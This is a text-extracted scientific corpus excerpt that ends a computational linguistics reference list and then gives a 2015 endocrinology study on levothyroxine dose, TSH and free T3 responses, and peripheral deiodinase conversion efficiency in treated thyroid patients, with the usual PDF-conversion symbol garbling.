Ney. 2003. A sys- tematic comparison of various statistical alignment models. Computational Linguistics, 29(1):19–51. Lawrence Page, Sergey Brin, Rajeev Motwani, and Terry Winograd. 1999. The PageRank citation ranking: Bringing order to the web. Technical Re- port 1999-66, Stanford InfoLab, November. Stefan Riezler, Alexander Vasserman, Ioannis Tsochantaridis, Vibhu Mittal, and Yi Liu. 2007. Statistical machine translation for query expansion in answer retrieval. In Proceedings of the 45th An- nual Meeting of the Association for Computational Linguistics (ACL). Radu Soricut and Eric Brill. 2006. Automatic question answering using the web: Beyond the factoid. Jour- nal of Information Retrieval - Special Issue on Web Information Retrieval, 9(2):191–206. Md. Arafat Sultan, Steven Bethard, and Tamara Sum- ner. 2014. Back to basics for monolingual align- ment: Exploiting word similarity and contextual ev- idence. Transactions of the Association for Compu- tational Linguistics, 2:219–230. Mihai Surdeanu, Massimiliano Ciaramita, and Hugo Zaragoza. 2011. Learning to rank answers to non- factoid questions from web collections. Computa- tional Linguistics, 37(2):351–383. Hanghang Tong, Christos Faloutsos, and Jia-Yu Pan. 2006. Fast random walk with restart and its applica- tions. In Proceedings of the 6th International Con- ference on Data Mining (ICDM). Xin-Jing Wang, Xudong Tu, Dan Feng, and Lei Zhang. 2009. Ranking community answers by modeling question-answer relationships via analogical reason- ing. In Proceedings of the Annual ACM SIGIR Con- ference. Max Whitney and Anoop Sarkar. 2012. Bootstrap- ping via graph propagation. In Proceedings of the 50th Annual Meeting of the Association for Compu- tational Linguistics. Xuchen Yao, Benjamin Van Durme, Chris Callison- Burch, and Peter Clark. 2013. Semi-Markov phrase-based monolingual alignment. In Proceed- ings of the Conference on Empirical Methods in Nat- ural Language Processing (EMNLP). David Yarowsky. 1995. Unsupervised word sense dis- ambiguation rivaling supervised methods. In Pro- ceedings of the 33rd Annual Meeting of the Associa- tion for Computational Linguistics (ACL). Wen-tau Yih, Ming-Wei Chang, Christopher Meek, and Andrzej Pastusiak. 2013. Question answering using enhanced lexical semantic models. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL). Benat Zapirain, Eneko Agirre, Lluis Marquez, and Mi- hai Surdeanu. 2013. Selectional preferences for se- mantic role classification. Computational Linguis- tics, 39(3). 210 work_ovwfhshipvdmtczjfk4mhb3qfm ---- doi:10.1530/EC-150056 E n d o cr in e C o n n e ct io n s Research Open Access J E M Midgley et al. Response to L-T4 therapy 1–10 4 : 196 Variation in the biochemical response to L-thyroxine therapy and relationship with peripheral thyroid hormone conversion efficiency John E M Midgley, Rolf Larisch1, Johannes W Dietrich2,3 and Rudolf Hoermann1 North Lakes Clinical, 20 Wheatley Avenue, Ilkley LS29 8PT, UK 1Department of Nuclear Medicine, Klinikum Luedenscheid, Paulmannshoeher Strasse 14, D-58515 Luedenscheid, Germany 2Medical Department I, Endocrinology and Diabetology, Bergmannsheil University Hospitals, Ruhr University of Bochum, Buerkle-de-la-Camp-Platz 1, D-44789 Bochum, Germany 3Ruhr Center for Rare Diseases (CeSER), Ruhr University of Bochum and Witten/Herdecke University, Alexandrinenstraße 5, D-44791 Bochum, Germany http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd This work is l Attribution-N Correspondence should be addressed to R Hoermann Email rudolf.hoermann@gmail.com Abstract Several influences modulate biochemical responses to a weight-adjusted levothyroxine (L-T4) replacement dose. We conducted a secondary analysis of the relationship of L-T4 dose to TSH and free T3 (FT3), using a prospective observational study examining the interacting equilibria between thyroid parameters. We studied 353 patients on steady-state L-T4 replacement for autoimmune thyroiditis or after surgery for malignant or benign thyroid disease. Peripheral deiodinase activity was calculated as a measure of T4–T3 conversion efficiency. In euthyroid subjects, the median L-T4 dose was 1.3 mg/kg per day (interquartile range (IQR) 0.94,1.60). The dose was independently associated with gender, age, aetiology and deiodinase activity (all P!0.001). Comparable FT3 levels required higher L-T4 doses in the carcinoma group (nZ143), even after adjusting for different TSH levels. Euthyroid athyreotic thyroid carcinoma patients (nZ50) received 1.57 mg/kg per day L-T4 (IQR 1.40, 1.69), compared to 1.19 mg/kg per day (0.85,1.47) in autoimmune thyroiditis (P!0.01, nZ76) and 1.08 mg/kg per day (0.82, 1.44) in patients operated on for benign disease (P! 0.01, nZ80). Stratifying patients by deiodinase activity categories of !23, 23–29 and O29 nmol/s revealed an increasing FT3–FT4 dissociation; the poorest converters showed the lowest FT3 levels in spite of the highest dose and circulating FT4 (P!0.001). An L-T4-related FT3–TSH disjoint was also apparent; some patients with fully suppressed TSH failed to raise FT3 above the median level. These findings imply that thyroid hormone conversion efficiency is an important modulator of the biochemical response to L-T4; FT3 measurement may be an additional treatment target; and L-T4 dose escalation may have limited success to raise FT3 appropriately in some cases. Key Words " thyroid hormone replacement " L-T4 therapy " levothyroxine " TSH " triiodothyronine " deiodinase " conversion icen on Endocrine Connections (2015) 4, 196–205 Introduction Thyroid disorders are among the most prevalent diseases in the western world, affecting as many as one out of seven adults (1). They are frequently associated with overt thyroid dysfunction, particularly various degrees of hypothyroidism that require thyroid hormone replace- ment (2, 3). This is mainly done by administration of sed under a Creative Commons Commercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 2–10 4 : 197 synthetic levothyroxine (L-T4), which is a well-established, convenient, safe and inexpensive treatment modality (4, 5). However, this does not accurately reflect the natural direct secretion pattern of both thyroid hormones triiodothyronine (T3) and thyroxine (T4) by the thyroid gland (6, 7). Unlike other drugs, dosing of L-T4 is not fixed but has to be titrated according to individual needs. Dose adequacy is mainly defined by reference to suitable biochemical standards, particularly thyrotropin (TSH) (8). This parameter has evolved into the main treatment target to be monitored and kept within an assumed euthyroid range (9). A number of studies have attempted to predict T4 requirement, and various regimes for a starting dose have been proposed based on an average of 1.6 mg/kg body weight (BW) or by more refined weight- or BMI-related algorithms (10, 11, 12, 13, 14, 15, 16). Although TSH measurement has dominated procedural management of thyroid replacement by its apparent ease and good standardisation, a disturbingly high proportion of patients remains unsatisfied with the treatment they receive (17, 18). This has prompted some authors including our group to question the validity of relying on the TSH level as the sole measure of dose adequacy in L-T4-treated patients (19, 20, 21). We have shown that the homeostatic equilibria between TSH and peripheral thyroid hormones are modulated by various influences such as age, body mass and the treatment modality itself (22). As a controlling element, the effective TSH level derived in a healthy normal population cannot necessarily be inferred to be equally optimal for a given patient on L-T4 medication, because the constitutive equilibria between TSH and thyroid hormones, especially FT3, differ in health and disease (22). In the present analysis, we examined the relationship of the L-T4 dose with clinical categories and bio- chemical outcomes such as TSH, FT4 and FT3 levels. We sought to define the interaction between TSH and the FT3 target and also to analyse the influences of modulators such as gender, age, disease category or the efficiency of T3 conversion from T4. Subjects and methods Study design and objective An open prospective observational study (ClinicalTrials.gov NCT01969552) was conducted at the Department of Nuclear Medicine at Klinikum Luedenscheid, Germany, http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd between July 2013 and February 2014 and approved by the Ethics Committee of the University of Muenster, Germany. Participants gave written informed consent. The present secondary analysis is restricted to the subgroup of patients on steady L-T4 treatment, examining dose requirements of L-T4 including conditioning modu- lators, thyroid hormone conversion efficiency and relationships with biochemical outcomes such as TSH, FT4 and FT3 levels. The primary study outcome, namely the analysis of the interacting equilibria and interrelations between thyroid parameters under various conditioning influences such as gender, age and body mass and L-T4 treatment has already been reported (22). Patients The original study involved 1912 adult patients who were consecutively seen, were free of severe comorbidity and provided written informed consent. For this subgroup analysis, 353 patients on thyroid hormone replacement meeting the following criteria were included: being seen as outpatients, presenting in a controlled functional state (FT4 R10 pmol/l and TSH %4 mU/l) and having reached a steady state on a constant L-T4 medication. Although infrequently seen in an ambulatory setting, patients with severe non-thyroidal illness or potentially interfering comorbidities were ineligible to participate in the study. This exclusion extended to other conditions and the use of comedications that may interfere with the resorption or measurement of thyroid hormones or with pituitary TSH. Patients with T3/T4 combination therapy (nZ9), anti-thyroid drug use (nZ99), hypothalamic/pituitary diseases (nZ5) or pregnancy (nZ3) were excluded before analysis. Diagnostic procedures included a detailed history, physical examination, standardised questionnaire docu- menting gender, age, height, weight, smoking habits (75% answered), prior surgery or radioiodine treatment, thyroid medication (brand, dosage, duration, time of intake), other drugs, laboratory tests (FT3, FT4, TSH and, if autoimmune thyroiditis was suspected or to be excluded, thyroid peroxidase antibodies (TPO-Ab) or TSH-receptor antibodies (TSH-R Ab)) and thyroid imaging. Laboratory methods TSH, FT3 and FT4 were measured with an automated direct chemoluminescence method (Advia Centaur XP, Siemens Healthcare Diagnostics, Erlangen, Germany). TSH is trace- able to the 3rd International Standard for TSH (WHO, IRP This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 3–10 4 : 198 81/565). A TSH range from 0.006 to 160 mU/l was linear, and coefficient of variations of inter-assay imprecision ranged from 0.9% to 2.4%. Reference intervals were laboratory established and pre-evaluated for the local population, using 10–23 pmol/l for FT4, 3.1–6.8 pmol/l for FT3 and 0.4–4.0 mU/l for TSH (23). TPO-Abs were determined by a competitive chemo- luminescence method (ADVIA Centaur XP, Siemens Healthcare Diagnostics, reference range !60 U/ml) and TSH-R Abs by competitive ELISA (Euroimmun AG, Lübeck, Germany, reference range !2 U/l). FT3–FT4 ratio and calculated deiodinase activity As measures of conversion efficiency, we calculated the FT3–FT4 ratio by simple division of both parameters in pmol/l and the sum activity of peripheral deiodinases (SPINA-GD, termed ‘deiodinase activity,’ thereafter, nmol/s) from equilibrium levels of FT4, FT3 and estimated constant parameters for plasma protein binding, distri- bution and elimination with ĜD Z b31ðKM1 CðFT4ÞÞð1 C K30ðTBGÞÞðFT3Þ a31ðFT4Þ nmol=s as previously described (20, 21, 24). Although the two measures are closely related in the linear part of the substrate relationship defined by Michaelis-Menten kinetics, only the more complex formula (GD) accounts for the saturation kinetics of the enzyme. In addition to using estimated deiodinase activity as a continuous variable, we divided deiodinase activity in three distinct categories defining poor (!23 nmol/s), intermediate (23–29 nmol/s) or good (O29 nmol/s) con- verters. The cut-offs were pre-specified based on obser- vations in L-T4-treated patients vs healthy untreated subjects and in low (!5 ml) vs higher thyroid volumes (22). They approximate turning points in the relationship between deiodinase activity and FT3, defining a central region with a derivative of about 0 and low or high regions with steeper slopes. Thyroid ultrasound and scintigraphy Thyroid volume was sonographically (10 MHz transducer) determined according to the ellipsoid formula. Reference values were !18 ml for females and !25 ml for males. A volume !1 ml was considered athyreotic. Larger nodules were further examined by scintigraphy. http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd Statistical methods Descriptive data are reported as median plus interquartile range (IQR). We used Wilcoxon’s rank sum or a c2 test in case of categorical variables for comparison of baseline characteristics. Correlations are based on Pearson’s product-moment when suitable or Kendall’s t. Multiple variables and conditional influences were analysed by a generalised linear model (GLM) and approximated by a linear regression function over restricted intervals. b coefficients were derived from a linear model. TSH was used after logarithmic transformation. We tested for collinearity in the models using the variance inflation factor. A GLM with a binomial function (logistic regression) was used to assess success rates of the L-T4 dose for reaching a TSH or FT3 target and to create dose- related probability plots. Relative proportions were statistically compared by receiver operating characteristic curves and Delong’s test. P values !0.05 were considered significant for all tests. Statistical analyses were performed using Deducer (version 0.7-7) and the R statistical package (Mac version 3.1.2) (25, 26). Results The present analysis comprises 353 patients in a stable controlled non-hypothyroid state on thyroid hormone replacement with L-T4. Patient characteristics are shown in Table 1. Of the total study group, 304 patients were euthyroid according to FT4, 342 according to FT3 and 216 according to TSH, based on their respective reference intervals with all displaying clinically satisfactory levels of medication. Dose requirements associated with biochemical euthyroidism (nZ208) defined by the reference ranges of all three parameters varied widely from 25 to 275 mg/day L-T4 (mean 98, median 100 (IQR 75, 125)) or 0.3 to 2.2 mg/kg BW per day (mean 1.2, median 1.3 (IQR 0.94, 1.60)). In univariate linear models, the L-T4 dose in the treated euthyroid panel was significantly associated with gender, age, body mass index, aetiology of disease, T3–T4 ratio and calculated deiodinase activity (all P!0.001) but not with TSH (PZ0.94). The influences remained indepen- dently predictive in a multivariable model (Table 2). TSH levels in the euthyroid range were unrelated to any of the above influences except disease category (PZ0.003), as might be expected considering the lower TSH target in malignant disease. Deiodinase activity was positively associated with thyroid volume (tZ0.23, This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ Table 1 Characteristics of study group (nZ353). For referencing purpose, parameters in 146 disease-free individuals from the same study were as follows: median age 38 (26, 49) years, TSH 1.62 (1.12, 2.25) mU/l, FT3 5.0 (4.8, 5.2) pmol/l, FT4 14.0 (13.0,15.1) pmol/l, calculated deiodinase activity 32.8 (30.0, 36.2) nmol/s, thyroid volume 10 (8,13) ml (22). Parameter Median (IQR) or percentage Gender (female, male) 280 (79%), 73 (21%) Age (years) 56 (46, 66) In women vs men 53 (45, 66) vs 59 (53, 64), PZ0.03 Disease aetiology (%) Autoimmune thyroiditis 27% Benign thyroid disease after surgery 32% Thyroid carcinomaa 41% Surgery, radioiodine treatment (%) 73%, 42% BMI (kg/m2) 27.5 (24.1, 30.8) Dose (mg/day) 100 (75, 150) Weight-adjusted daily dose (mg/kg per day) 1.47 (1.09, 1.72) TSH (mU/l) 0.64 (0.12, 1.47) FT3 (pmol/l) 4.80 (4.40, 5.30) FT4 (pmol/l) 18.6 (16.2, 21.1) TPO-Ab (U/l) 450 (48, 1300), positive 65%, nZ97 FT3–FT4 ratio 0.26 (0.24, 0.29) Deiodinase activity (nmol/s) 24.3 (21.8, 27.1) Thyroid volume (ml) – total group 2 (0, 7) Autoimmune thyroiditis 7 (4,11) Benign thyroid disease post surgery 6 (2,10) Thyroid carcinomab 0 (0, 0) a82% of the thyroid carcinoma patients had a higher TNM stage than 1. b96% had no detectable residual thyroid volume by ultrasound after total thyroidectomy and radioiodine treatment. Table 2 b coefficients in a linear model of covariates predicting dose of L-T4 in the euthyroid panel. The multivariable model was simultaneously fitted with the parameters listed, all of which were significant predictors of the L-T4 dose in univariate models. All variance inflations factors were !1.2. Variable b coefficient (95% CI) Gender male vs female 0.22 (0.11, 0.33), P!0.001 Disease aetiology Autoimmune vs malignant disease K0.33 (K0.47, K0.19), P!0.001 Benign goitre vs malignant disease K0.34 (K0.48, K0.20), P!0.001 Age K0.26 (K0.37, K0.15), P!0.001 BMI 0.33 (0.22, 0.44), P!0.001 Deiodinase activity K0.27 (K0.39, K0.15), P!0.001 E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 4–10 4 : 199 P!0.001, nZ208) but inversely correlated with weight- adjusted L-T4 dose (rZK0.37, P!0.001, nZ208). In a biochemically defined euthyroid state excluding subclinically hyperthyroid subjects, athyreotic thyroid carcinoma patients received significantly higher doses of L-T4 (1.57 mg/kg BW per day (IQR 1.40, 1.69), nZ50)) than patients with autoimmune thyroiditis (1.19 mg/kg BW per day (IQR 0.85, 1.47), nZ76, P!0.001)) or benign thyroid disease post surgery (1.08 mg/kg BW per day (IQR 0.82, 1.44), nZ80, P!0.001)). Furthermore, after adjusting for differing levels of TSH suppression in a linear model the weight-adjusted L-T4 dose was higher in athyreotic carcinoma patients compared to autoimmune thyroiditis or benign disease (P!0.001, Fig. 1A). Similarly, the dose required to achieve the same FT3 concentration was higher in the carcinoma group (P!0.001, Fig. 1B). Median thyroid volume was 0 ml (IQR 0, 0 ml) in carcinomas, 7 ml (IQR 4, 11 ml) in autoimmune thyroiditis and 6 ml (IQR 3, 8 ml) in benign goitre post surgery. The weight-adjusted L-T4 dose was inversely correlated with the thyroid volume in the three diagnostic groups (rZK0.22, PZ0.002, nZ208). Three distinct categories of conversion efficiency were defined (see Subjects and methods) as follows: poor converters !23 nmol/s, intermediate converters http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd 23–29 nmol/s and good converters O29 nmol/s deiodi- nase activity. The poor converters reached significantly (P!0.001) higher FT4 concentrations in the circulation than intermediate or good converters but, at the same time, showed significantly (P!0.001) lower absolute FT3 levels compared to the other two groups (Fig. 2). While the FT3–FT4 dissociation was apparent in all three disease entities, it was most pronounced in the carcinoma group (nZ143, Fig. 2). The latter group showed the highest This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ −6 −4 −2 0 2A B 1 2 3 L−T4 Dose (µg/kg BW/d) ln T S H ( m U /l ) Disease Carcinoma AIT Goitre 2 4 6 8 1 2 3 L−T4 Dose (µg/kg BW/d) F T 3 ( p m o l/ l) Disease Carcinoma AIT Goitre Figure 1 TSH (A) or FT3 (B) vs weight-adjusted L-T4 dose in three groups of patients on thyroid hormone replacement, with autoimmune thyroiditis (nZ96), after surgery for benign goitre (nZ111) or thyroid carcinoma (nZ143). Between group differences in both panels were significant (P!0.01) and remained so after adjusting for volume (not shown, P!0.01), as evidenced by linear models with the diagnostic group as a covariate. See text for further details. AIT, autoimmune thyroiditis; Goitre, goitre post surgery for benign nodular thyroid disease. 2 4 6 8A B C Carcinoma AIT Goitre F T 3 ( p m o l/ l) ** ** *** ** ** 10 20 30 Carcinoma AIT Goitre F T 4 ( p m o l/ l) ** ** ** ** ** ** –6 –4 –2 0 2 Carcinoma AIT Goitre ln T S H ( m U /l ) n 3166 69 8 49 16 32 56 23 n 3166 69 8 49 16 32 56 23 n 3166 69 8 49 16 32 56 23 Figure 2 FT3 (A), FT4 (B) and TSH (C) levels in L-T4-treated patients stratified by disease and conversion efficiency. The disease entities were closely associated with categories of the thyroid volume (see Table 1 and text). The red box refers to poor converters (calculated deiodinase activity !23 nmol/s), green to intermediate converters (deiodinase activity 23–29 nmol/s) and blue to good converters (deiodinase activity O29 nmol/s). Remarkably, absolute FT3 concentrations were lowest in the poor converter group in all disease categories, while FT4 levels were highest in the poor converters. Wilcoxon test, revealed significant differences compared to each first group; *P!0.05, **P!0.001. AIT, autoimmune thyroiditis; goitre, goitre post surgery for benign nodular thyroid disease. E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 5–10 4 : 200 proportion of poor converters (Fig. 2). The converter groups were similar (PO0.1) in their age, BMI, weight- adjusted L-T4 dose and TSH levels except for men being overrepresented in the good converter group (P!0.01). Converter categories of the carcinoma group were comparable (PZ0.42) in their thyroid residual volumes, which were below 1 ml in 96% of all cases. In contrast, in the combined group of benign diseases the converter status was significantly associated with thyroid volume (4 (2, 8) vs 7 (4, 11) vs 8 (5, 12) ml, PZ0.009). Thyroid volumes differed between the carcinoma group and the benign diseases (P!0.001) but not between autoimmune thyroiditis and goitre post surgery (PZ0.25, Table 1). http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ L–T4 dose (µg/kg BW/d) P ro b a b ili ty o f T S H s u p p re ss io n 0.2 0.4 0.6 0.8 1.0 A B 1.0 1.5 2.0 2.5 3.0 3.5 5 p m o l/l 0.8 1.0 E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 6–10 4 : 201 A given weight-adjusted dose suppressed the TSH below the lower reference limit (!0.4 mU/l) in a higher proportion of carcinoma patients, than it raised their FT3 level above the median level typical of the euthyroid controls (O5 pmol/l) (Fig. 3A and B). Conversely, much lower doses reached a target of a fully suppressed TSH compared to the FT3 median (Fig. 3A and B). The same tendency is true for a more modest target below 1 mU/l for TSH in autoimmune thyroiditis or benign disease post surgery, although variation was higher in this panel (Fig. 3C and D). Overall, a significantly higher proportion of patients achieved TSH suppression compared to FT3 above median by Delong’s test employing receiver operating characteristic curves (P!0.001). C D L–T4 dose (µg/kg BW/d) P ro b a b ili ty o f F T 3 > 0.2 0.4 0.6 1.0 1.5 2.0 2.5 3.0 3.5 L–T4 dose (µg/kg BW/d) P ro b a b ili ty o f T S H < 1 m U /l 0.3 0.4 0.5 0.6 0.7 0.8 0.9 0.5 1.0 1.5 2.0 2.5 3.0 L–T4 dose (µg/kg BW/d) P ro b a b ili ty o f F T 3 > 5 p m o l/l 0.2 0.3 0.4 0.5 0.6 0.7 0.5 1.0 1.5 2.0 2.5 3.0 Figure 3 Probability plot of weight adjusted L-T4 dose to (A) suppress TSH below its lower reference limit (0.4 mU/l) or (B) raise FT3 above the median of euthyroid controls (O5 pmol/l) in the carcinoma patients (nZ143), and (C) suppress TSH !1 mU/l or (D) elevate FT3 above 5 pmol/l in benign disease (patients with autoimmune thyroiditis, nZ75 and nodular thyroid disease post surgery, nZ111). Probability plots were created by logistic regression. The shaded areas indicate the confidence interval surrounding the fitted curve. The TSH targets were more frequently reached at a lower dose than the FT3 target (see Results). Discussion In this cohort, dose requirements for L-T4-treated patients varied in a large euthyroid panel and were associated with many influences including gender, age, disease category and thyroid hormone conversion efficiency. However, not all of the treatment conditions necessarily aim at a biochemically euthyroid thyroid state as a comprehensive therapeutical goal, as defined by maintaining the respect- ive reference ranges of all three parameters: TSH, FT4 and FT3. Particularly, in the treatment of thyroid carcinomas, for many patients in our sample the target was a lower or suppressed TSH below the reference range, which, as a consequence, raised FT4 levels above the upper reference range in a proportion of these patients. At both com- parable levels of TSH suppression or similar FT3 concen- trations, athyreotic thyroid carcinoma patients were taking a higher weight-adjusted dose of L-T4. Three remarkable and linked observations from this study were a dissociation between FT3 and FT4, an apparent disjoint between TSH and FT3 and an inverse association between L-T4 dose and conversion efficiency. The present study was a cross-sectional secondary analysis not involving a randomised design. As previously reported in a separate communication (22), the primary aim of this prospective observational study was to analyse further the interacting equilibria. While introducing some uncontrolled variations, this allowed for the study of a broader natural spectrum of responses, as observed in consecutive patients. FT3 or FT4 measurements were not compromised in any way by problematic conditions such as the non-thyroid illness syndrome, as the study was conducted in a cohort of otherwise ‘healthy’ out-patients without relevant comorbidity. There was no evidence for a potential bias stemming from a variable time interval http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 7–10 4 : 202 between L-T4 intake and blood sampling, which might result in an expected slight temporary elevation of circulating FT4 concentrations, as previously discussed (22). There were neither linear (PZ0.27) nor non-linear (PZ0.28) relationships with deiodinase activity. In L-T4 treatment, equilibria typical of the healthy state were found not to be invariant, but profoundly altered (22). Here we disclose further consequences that are associated with alterations in the regulatory patterns in patients under L-T4 therapy. In particular, one aspect relates to the L-T4 dose and conversion efficiency. We estimated T4–T3 conversion by calculating the sum activity of peripheral deiodinases (see Subjects and methods). The measure is similar to the FT3–FT4 ratio, albeit more precise wherein it accounts for non-linear enzyme saturation kinetics. However, it does not further differentiate global activity by type of deiodinase. Thus, the source of T3 or contribution of various tissues to the T3 plasma pool cannot be discerned. We found that a poor converter status was associated with a higher L-T4 dose and higher serum FT4 levels but still lower absolute FT3 concentrations, compared to the more efficient converters. This paradoxically relates the higher T4 supply to a worsened rather than improved absolute FT3 level. This is not to say that an increasing dose will not raise on average the FT3 but that the dose response varies widely among individuals, and conversion ineffi- ciency in some patients may outweigh the dose effect in terms of achievable absolute FT3 concentrations. How can this be explained? A high L-T4 dose may not invariably remedy T3 deficiency owing to T4-induced conversion inefficiency but could actually hinder its attainment through the inhibitory actions of the substrate itself and/or reverse T3 (rT3) on deiodinase type 2 activity (27). A study by Cettour-Rose et al. (28) confirmed that rT3, when infused into rats, inhibited deiodinase type 2 activity in the pituitary, cerebral cortex and brown adipose tissue, but interestingly, this did not have much impact on circulating T4, T3 and TSH concentrations in the animals. However, in this model the rT3 effect was studied under rather artificial conditions in the absence of an abundant T4 supply with elevated FT4 levels that characterizes the treatment situation. In contrast, another recent experimental study has shown that escalating only the L-T4 dose fails to normalize serum T3 in the rat, and as a result, irrespective of local variations by type of deiodinase, all organs examined such as the brain, liver and skeletal muscle were hypothyroid at the tissue level in the presence of a normal serum TSH (29). This study suggests http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd ubiquitination may be the limiting factor for T4 alone to restore true tissue euthyroidism in the rodent (29). The lack of TSH stimulation and absence or functional deficiency of the thyroid gland may also impair T4–T3 conversion (30). Another important consideration is that, just as FT4 and FT3 dissociate under L-T4 therapy, so do TSH and FT3. While a high proportion of patients was able to achieve a target of a suppressed TSH below the lower reference limits or a TSH value !1 mU/l in autoimmune thyroiditis, their FT3 levels at the same time frequently remained below the median FT3 level found in normal subjects. The situation differs from conditions in which L-T4 absorption may be impaired and, as a consequence, elevated TSH levels persist (31, 32, 33). Thus, not even an L-T4 dose in which TSH is fully suppressed and FT4 by far exceeds its upper reference limit can guarantee above average FT3 levels in these patients, indicating an FT3–TSH disjoint. As a consequence, although dose escalation may help some patients who maintained a sufficiently efficient thyroid hormone conversion to raise their FT3 for euthyroidism and well-being, the strategy may not be invariably successful in all patients. In two studies, w15% of athyreotic patients could not even raise their FT3 above the lower reference limit on L-T4 (19, 20). Another controlled follow-up study after hemithyroidectomy for benign euthyroid goitre suggests that this deficiency may have unwanted clinical consequences. In this study, weight gain after 2 years in association with a lowered thyroid function within the laboratory reference range was interpreted as a clinical manifestation of a perma- nently decreased metabolic rate (34). L-T4 dose requirements have been well studied and various regimes based on weight, BMI or more refined algorithms have been proposed to put patients on a presumed adequate dose from the very beginning (10, 11, 12, 13, 14, 15, 16, 35, 36, 37, 38, 39). As useful as these algorithms may be for average predictions and initial guidance in the general population, they do not take into account individual variations in the response to L-T4, such as conversion efficiency. Dosing strategies solely based on a TSH definition of euthyroidism neglect the important role of FT3, which has recently emerged as an equally significant parameter in defining thyroid physiology (20, 22, 29, 30, 40, 41). Central and peripheral regulatory mechanisms do not constitute divided levels of control, as has previously been assumed. Rather they are integrated via feed-forward control of deiodinase activity by TSH and operate jointly to maintain T3 homeostasis as an over- arching goal (30). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 8–10 4 : 203 While acknowledging the role of genetically determined differences in deiodinase activity affecting conversion rates, the poor converter status described here appears to emerge mainly as a consequence of the T4 monotherapy itself, induced by the mechanisms discussed above (42, 43, 44, 45). Compared to untreated subjects, deiodinase activity and conversion efficiency tend to be diminished in L-T4 treatment (20, 22). However, individ- ual pre-treatment measurements were not available for comparison. We found conversion inefficiency to be significantly correlated with low residual thyroid volume and most prevalent in athyreotic patients. However, differences in deiodinase activities were also apparent in the absence of a functioning thyroid gland within the group of thyroidectomised carcinoma patients. Overall, patients differ widely in the degree of the conversion impairment they suffer. This, in turn, may influence their dose requirements of L-T4 and, at a comparable weight- adjusted L-T4 dose, their levels of TSH suppression and circulating FT3 concentrations. We speculate that L-T4-induced conversion ineffi- ciency could prevent some vulnerable subjects from reaching true tissue normality on T4 monotherapy alone. Those were not analysed separately in the numerous earlier T3/T4 trials and could be possible candidates for a combined T3/T4 treatment option, as recognized by some authors and the guidelines of the European Thyroid Association (46, 47). As a limitation, this study addresses biochemical treatment responses but did not evaluate patient-reported outcomes or biomarkers of thyroid hormone action. Whether conversion efficiency and the resulting differences in relationships between TSH, FT4 and FT3 are clinically useful markers of dosing inadequacy requires further well-designed prospective studies. Patient satis- faction, complaints and symptoms play an essential part in the clinical assessment. However, owing to considerable inter-individual variation, these measures apparently lack statistical power in a trial setting and have not been clearly linked to prognosis. For example, even a change in thyroid function as profound as the transition from the hypo- thyroid to the euthyroid state may be associated with only modest improvements in thyroid-related quality-of-life measures in patients with autoimmune thyroiditis (48). As a result, a trial size of several thousand subjects may be required to produce a credible result with adequate discriminatory power. Additionally, the exact outcome would depend on the overall makeup of the panel as regards the mixture of T4–T3 conversion capabilities. Possible long-term consequences of the observed http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd biochemical alterations such as the altered FT3–FT4 ratio are also presently unknown. The findings of the present study have several clinical implications. First, they recognize thyroid hormone conversion efficiency, as defined by the calculated global deiodinase activity or more simply the T3–T4 ratio, is an important determinant of L-T4 dose requirements and the biochemical response to treatment. Second, in view of a T4-related FT3–TSH disjoint, FT3 measurement should be adopted as an additional treatment target. Third, in cases where an FT3–FT4 dissociation becomes increasingly apparent following dose escalation of L-T4, an alternate treatment modality, possibly T3/T4 combination therapy, should be considered, but further randomized controlled trials are required to assess the benefit versus risk in this particular group. Declaration of interest J W Dietrich is co-owner of the intellectual property rights for the patent ‘System and Method for Deriving Parameters for Homeostatic Feedback Control of an Individual’ (Singapore Institute for Clinical Sciences, Biomedical Sciences Institutes, Application Number 201208940e20120895). All other authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This research did not receive any specific grant from any funding 